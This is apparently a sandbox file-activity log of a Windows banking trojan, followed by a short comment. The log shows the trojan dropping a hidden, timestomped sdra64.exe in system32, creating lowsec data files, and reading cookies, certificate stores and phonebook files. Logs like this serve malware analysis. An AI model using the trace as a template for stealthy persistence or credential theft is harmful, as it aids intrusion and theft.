Set File Attributes: C:WINDOWSsystem32lowseclocal.ds Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Delete File: C:WINDOWSsystem32lowseclocal.ds
Create File: C:WINDOWSsystem32lowseclocal.ds
Open File: .pipe_AVIRA_2108 (OPEN_EXISTING)
Find File: C:WINDOWSsystem32lowsecuser.ds.lll
Find File: C:WINDOWSsystem32lowsecuser.ds
Open File: C:WINDOWSsystem32lowseclocal.ds (OPEN_EXISTING)
Move File: C:WINDOWSsystem32lowsecuser.ds to C:WINDOWSsystem32lowsecuser.ds.lll
Create/Open File: C:WINDOWSsystem32lowsecuser.ds.lll (OPEN_ALWAYS)
Open File: DeviceRdpDr ()
Open File: .PIPEwkssvc (OPEN_EXISTING)
Open File: .shadow (OPEN_EXISTING)
Open File: .PIPEDAV RPC SERVICE (OPEN_EXISTING)
Set File Attributes: C:WINDOWSsystem32lowsecuser.ds.lll Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Delete File: C:WINDOWSsystem32lowsecuser.ds.lll
Get File Attributes: WINDOWSSYSTEM32 Flags: (SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Open File: .PIPEROUTER (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: WINDOWSSYSTEM32 Flags: (SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Open File: .PIPEROUTER (OPEN_EXISTING)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Open File: C:Windowslogfile32.txt (OPEN_EXISTING)
Create File: C:Windowslogfile32.txt
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Temptmp8.tmp
Open File: .pipe_AVIRA_2108 (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@apmebf[1].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@bluekai[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@nonstoppartner[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[3].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@at.atwola[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[5].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[1].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@emjcd[1].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@mail.google[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@doubleclick[1].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@www.google[1].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@burstnet[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@fastclick[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@advertising[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@quantserve[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@microsoft[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@malektips[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@www.burstnet[2].txt (OPEN_EXISTING)
Open File: C:Dokumente und EinstellungenAdministratorCookiesadministrator@tacoda[1].txt (OPEN_EXISTING)
Open File: .pipe_AVIRA_2109 (OPEN_EXISTING)
Create/Open File: C:WINDOWSsystem32lowsecuser.ds (OPEN_ALWAYS)
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMacromediaFlash Player*
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftSystemCertificatesMyCertificates*
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftSystemCertificatesMyCRLs*
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftSystemCertificatesMyCTLs*
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdaten*
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdaten*
Find File: C:Programme*
Find File: C:WINDOWS*
Find File: C:*
Open File: C:WINDOWSsystem32lowseclocal.ds (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Set File Attributes: C:WINDOWSsystem32sdra64.exe Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Delete File: C:WINDOWSsystem32sdra64.exe
Copy File: C:DOKUME~1ADMINI~1LOKALE~1Temptmp8.tmp to C:WINDOWSsystem32sdra64.exe
Set File Attributes: C:WINDOWSsystem32sdra64.exe Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:WINDOWSsystem32sdra64.exe (OPEN_EXISTING)
Open File: C:WINDOWSsystem32ntdll.dll (OPEN_EXISTING)
Set File Time: C:WINDOWSsystem32sdra64.exe
Set File Attributes: C:WINDOWSsystem32sdra64.exe Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_READONLY SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Create/Open File: C:WINDOWSWindowsUpdate.log (OPEN_ALWAYS)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:WINDOWSSoftwareDistributionautest.cab Flags: (SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk (OPEN_EXISTING)
Find File: C:WINDOWSSoftwareDistributionDataStoreLogsedb*.log
Find File: C:WINDOWSSoftwareDistributionDataStoreLogsedb
Anonymous - January 18, 2010 at 1:58 pm
一起加油吧..................................................